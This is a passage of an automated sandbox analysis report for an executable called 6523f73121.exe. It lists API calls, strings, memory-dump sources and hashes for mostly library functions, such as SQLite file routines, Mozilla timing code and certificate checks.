Associated: 00000003.00000002.2207148465.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_120000_skotes.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: e56c75f2e431ad977c45cec8f28de688efeb9e05e0e451714bfb150d58e8faa2
Instruction ID: 7ed13c6d83c66d3ffeb4aaccac2cf8cc2da7925bef528594584666ec05858b32
Opcode Fuzzy Hash: e56c75f2e431ad977c45cec8f28de688efeb9e05e0e451714bfb150d58e8faa2
Instruction Fuzzy Hash: 61211D71A00219AFDF01EBA4D8829BEB7B9EF58710F100015F605BB251DB30AD419BA0

Analysis Process: 6523f73121.exePID: 4132, Parent PID: 6316COMMON

Execution Graph

Execution Coverage:	1.5%
Dynamic/Decrypted Code Coverage:	90.8%
Signature Coverage:	1.2%
Total number of Nodes:	1058
Total number of Limit Nodes:	143

Executed Functions

Function 6D5435A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6D5CF688,00001000), ref: 6D5435D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6D5435E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6D5435FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6D54363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6D54369F
__aulldiv.LIBCMT ref: 6D5436E4
QueryPerformanceCounter.KERNEL32(?), ref: 6D543773
EnterCriticalSection.KERNEL32(6D5CF688), ref: 6D54377E
LeaveCriticalSection.KERNEL32(6D5CF688), ref: 6D5437BD
QueryPerformanceCounter.KERNEL32(?), ref: 6D5437C4
EnterCriticalSection.KERNEL32(6D5CF688), ref: 6D5437CB
LeaveCriticalSection.KERNEL32(6D5CF688), ref: 6D543801
__aulldiv.LIBCMT ref: 6D543883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6D543902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6D543918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6D54394C

Strings

QPC, xrefs: 6D5438FC
GenuntelineI, xrefs: 6D543639
MOZ_TIMESTAMP_MODE, xrefs: 6D5435DB
GTC, xrefs: 6D543912
AuthcAMDenti, xrefs: 6D543946

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: 6a9bed9166e53bc35f285ba849945edafe28915a4313a8e23f7954a0005e9d07
Instruction ID: 60f24f129a75164306f760e4a748b02f8fe96edb678df3ccbd58550f4862c6f1
Opcode Fuzzy Hash: 6a9bed9166e53bc35f285ba849945edafe28915a4313a8e23f7954a0005e9d07
Instruction Fuzzy Hash: 59B1B471A097119BDF0CDF28C84572ABBF5BB89700F06892EE899D3B60D7749940CB82

Function 61E354D1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32(?,?,61ECC400,?,61E35248), ref: 61E354EB

Strings

HRa, xrefs: 61E3554C

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID: InfoSystem
String ID: HRa
API String ID: 31276548-1004199025
Opcode ID: 90f829b77809e80cd7cc556866e5c439b2c19dcd8d7a36888ffec522c66ecd4c
Instruction ID: 06cda1940385b8855eb11c4b22b944da250b3e82bd825487f891a332eec36e05
Opcode Fuzzy Hash: 90f829b77809e80cd7cc556866e5c439b2c19dcd8d7a36888ffec522c66ecd4c
Instruction Fuzzy Hash: 56F03AB02083419BD704AFA4C60631FBAF5AFC6B09F66C82DD1858B380CB75D8559B93

Function 61E4B8A1 Relevance: 1.6, APIs: 1, Instructions: 323COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 61E4BBA6

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: ed4d27912dbe291840a559579dab3d42a6617fb12eb7351fcaeaaaeb62aa1ba8
Instruction ID: 0d30bdf3ca1535cc6e9debfec2a3fa3a34d16498aff86589297f71c0a5a37c1e
Opcode Fuzzy Hash: ed4d27912dbe291840a559579dab3d42a6617fb12eb7351fcaeaaaeb62aa1ba8
Instruction Fuzzy Hash: 7DC15D30E082858BEB15CFA8E4D079D7AF1AF8831CF29C46DD8469B349EB74D885CB51

Function 61E496F9 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 330
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

winShmMap1, xrefs: 61E49911
winOpenShm, xrefs: 61E49857
winShmMap3, xrefs: 61E49A30
winShmMap2, xrefs: 61E49981

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID: free
String ID: winOpenShm$winShmMap1$winShmMap2$winShmMap3
API String ID: 1294909896-1629717226
Opcode ID: c02159974a3cf3a7f7b7568101e2cb8f8d170c147185301375ae6501796f5089
Instruction ID: 8d0c298248e1ba2ecef5768321b4e8eead2654d32140d3df1cef0edc35cdcae1
Opcode Fuzzy Hash: c02159974a3cf3a7f7b7568101e2cb8f8d170c147185301375ae6501796f5089
Instruction Fuzzy Hash: EDE122B4A04346DFDB04DF68D680A5ABBF0BF89358F25C46DE898AB355D734D841CB82

Function 61E541A0 Relevance: 8.3, APIs: 2, Strings: 3, Instructions: 772stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 61E541DC
strcmp.MSVCRT ref: 61E543C4

Part of subcall function 61E0AE03: free.MSVCRT ref: 61E0AE3D

Strings

@, xrefs: 61E54291
rnal, xrefs: 61E547EC
$[a, xrefs: 61E549DA

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID: strcmp$free
String ID: $[a$@$rnal
API String ID: 3401341699-3833003606
Opcode ID: d900b6477cbc9ad4b3589abe5105fa9a5ec22ddc9d2352c34a79c06cd02d6557
Instruction ID: 0ce42be2a52064457b78e7c31244c3f07411abd0ae8e299ce13c5538bbb98839
Opcode Fuzzy Hash: d900b6477cbc9ad4b3589abe5105fa9a5ec22ddc9d2352c34a79c06cd02d6557
Instruction Fuzzy Hash: 70822470A04259CFEB60CF68C880B89BBF1BF45308F2481EAD8589B352E775D9A5CF51

Function 61E4C7C5 Relevance: 8.0, APIs: 4, Strings: 1, Instructions: 467
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcmp.MSVCRT ref: 61E4C91F
memcmp.MSVCRT ref: 61E4C973
memcmp.MSVCRT ref: 61E4C9F2
memcmp.MSVCRT ref: 61E4CC23

Strings

0, xrefs: 61E4CC0C

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID: memcmp
String ID: 0
API String ID: 1475443563-4108050209
Opcode ID: 2323e3c7c0fdcc6229826e8dd85eed2d4faf35de75db51dca9186856c8af6737
Instruction ID: 3bb57cbd4086e38ca070a1eb41e2420ec87b0c0feb17810d174f813009c16240
Opcode Fuzzy Hash: 2323e3c7c0fdcc6229826e8dd85eed2d4faf35de75db51dca9186856c8af6737
Instruction Fuzzy Hash: 66127D70F05255CFEB05CFA8E484789BBF1AF48318F25C1A9D845AB356D774E88ACB80

Function 6D55C930 Relevance: 7.6, APIs: 5, Instructions: 83
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32(?), ref: 6D55C947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6D55C969
GetSystemInfo.KERNEL32(?), ref: 6D55C9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6D55C9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6D55C9E2

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: c13f7f2dab767650393371027ec561e1e7dd4f28cdb3be52d351c82956df8a44
Instruction ID: 8b15bb307f5338ec1234d09cda7f6e29a3442eb8c578c78a4137e78f0c90025b
Opcode Fuzzy Hash: c13f7f2dab767650393371027ec561e1e7dd4f28cdb3be52d351c82956df8a44
Instruction Fuzzy Hash: B921D7316416186BDF1A9A24CC84BBE73B9BB47700F91051EF906A7E84EB706C00C791

Function 61E3720A Relevance: 6.4, APIs: 3, Strings: 1, Instructions: 359
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcmp.MSVCRT ref: 61E373CE
memcmp.MSVCRT ref: 61E37560
memcmp.MSVCRT ref: 61E37690

Strings

0, xrefs: 61E3767C

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID: memcmp
String ID: 0
API String ID: 1475443563-4108050209
Opcode ID: 9e2e599bb5cce63fe32fe7f9e08e295b7a4ccdfaa8ca869e8474522b2882bf1c
Instruction ID: 3f20ce3ba2961136da7f3248cde08971803f4c449cb9daae0617fd169a942f67
Opcode Fuzzy Hash: 9e2e599bb5cce63fe32fe7f9e08e295b7a4ccdfaa8ca869e8474522b2882bf1c
Instruction Fuzzy Hash: 6CE112B0E04269CBDB41CFA8C99078DBBF1BF89318F258569D859AB345D734E886CF41

Function 61E4928D Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 309
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32 ref: 61E4947D

Strings

exclusive, xrefs: 61E493FC
winOpen, xrefs: 61E49605

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID: CreateFile
String ID: exclusive$winOpen
API String ID: 823142352-1568912604
Opcode ID: 01019530b09c2f2dc19d5b6d0433bfa8033a639c81976d1931ed62cac87c2c49
Instruction ID: ddd978882cd5270fa8f94071a9300b4b805ea89cb158bd2aa8a7dfbc70792811
Opcode Fuzzy Hash: 01019530b09c2f2dc19d5b6d0433bfa8033a639c81976d1931ed62cac87c2c49
Instruction Fuzzy Hash: B4D1A2709047499FDB10DFA9D58478EBBF0AF88318F208929E868EB394E774D985CF41

Function 61E33F01 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNEL32 ref: 61E33FB1

Strings

winRead, xrefs: 61E33FF4

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID: FileRead
String ID: winRead
API String ID: 2738559852-2759563040
Opcode ID: 851fea00ae6f1ba7616ac175e32ee1177d3feb74bace6ba213d978081e29e1e5
Instruction ID: 0463a8294cdaeeb391ba6f45b5ad466d8cdf6662135ec028d0205bc88dba3c8e
Opcode Fuzzy Hash: 851fea00ae6f1ba7616ac175e32ee1177d3feb74bace6ba213d978081e29e1e5
Instruction Fuzzy Hash: 2041E475A052699BCF04CFA8D88498EBBF2FF88314F618529E868A7354D730E941CB91

Function 61E3402F Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNEL32 ref: 61E3404C

Strings

winClose, xrefs: 61E34086

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID: CloseHandle
String ID: winClose
API String ID: 2962429428-4219828513
Opcode ID: c60c52094e65ead93584bd01b08d1abc788ebbc504c85440e44ebfbab32f71d9
Instruction ID: 774f0b390e99eda96ce63d5266cab459109c075f265339c96ef3e2cb904a27c1
Opcode Fuzzy Hash: c60c52094e65ead93584bd01b08d1abc788ebbc504c85440e44ebfbab32f71d9
Instruction Fuzzy Hash: EBF09670B043259BE700AF75C5C4A5AFBA4EF89314F20C46DD8898B342D73AD944CB92

Function 61E2A652 Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 61E2A66D

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID: realloc
String ID:
API String ID: 471065373-0
Opcode ID: e26b6afafbe88dd408296985b2cf5437b863de116ceff75567ad09f3e2b45908
Instruction ID: 4040ac9b910eb7d7724dfc403353a0a40a3fe088e4c24dccbd46c39564703f2d
Opcode Fuzzy Hash: e26b6afafbe88dd408296985b2cf5437b863de116ceff75567ad09f3e2b45908
Instruction Fuzzy Hash: C3F0F97180530A9FDB109F55C58195DFBE8EF84268F14C86DE8984B310D374E544CF91

Function 61E0AE03 Relevance: 1.3, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 61E0AE3D

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 515cd9b0cc975ca03c008dfe43f6ff5eb83953987e78c9cd7cdb726aa12e4eb5
Instruction ID: a929929d55870eb2e3dfc3d9b08de53e37bb6c9da6c43a06ed963554b33c57a4
Opcode Fuzzy Hash: 515cd9b0cc975ca03c008dfe43f6ff5eb83953987e78c9cd7cdb726aa12e4eb5
Instruction Fuzzy Hash: A5F090B1554708CFDB006FA8E8C52153BA4F746219F5840BAE8150B201D735D5E1CB91

Function 61E2A6AF Relevance: 1.3, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 61E2A6BF

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 1f2356de957b5852e51c4f16dd739168b253dd6d2aac726755fb4680bcc79cb1
Instruction ID: 08a60fc229ca929b4850671bf03eed3452f9cad2ea52f9bb94d0a5c68b8f0e05
Opcode Fuzzy Hash: 1f2356de957b5852e51c4f16dd739168b253dd6d2aac726755fb4680bcc79cb1
Instruction Fuzzy Hash: 68F039B0C4830A9FCB009FA5DAC5A0DBBE8EB84258F14C46DE8988F710D334E580CB51

Non-executed Functions

Function 6D556C80 Relevance: 81.2, APIs: 42, Strings: 4, Instructions: 727encryptionfileCOMMON

Download Yara Rule

APIs

CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6D556CCC
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6D556D11
memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6D556D35
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6D556D53
CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6D556D73
CertGetNameStringW.CRYPT32 ref: 6D556DC0
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6D556DEB
CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6D556DFF
CertFreeCertificateContext.CRYPT32(00000000), ref: 6D556E10
CryptMsgClose.CRYPT32(00000000), ref: 6D556E27
CertCloseStore.CRYPT32(00000000,00000000), ref: 6D556E34
CreateFileW.KERNEL32 ref: 6D556EF9
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6D556F8C
memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6D55709D
CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6D557103
CloseHandle.KERNEL32(?), ref: 6D557176
__Init_thread_footer.LIBCMT ref: 6D557209
__Init_thread_footer.LIBCMT ref: 6D55723A
__Init_thread_footer.LIBCMT ref: 6D55726B
__Init_thread_footer.LIBCMT ref: 6D55729C
__Init_thread_footer.LIBCMT ref: 6D5572DC
__Init_thread_footer.LIBCMT ref: 6D55730D
memset.VCRUNTIME140(?,00000000,00000110), ref: 6D5573C2
VerSetConditionMask.NTDLL ref: 6D5573F3
VerSetConditionMask.NTDLL ref: 6D5573FF
VerSetConditionMask.NTDLL ref: 6D557406
VerSetConditionMask.NTDLL ref: 6D55740D
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6D55741A
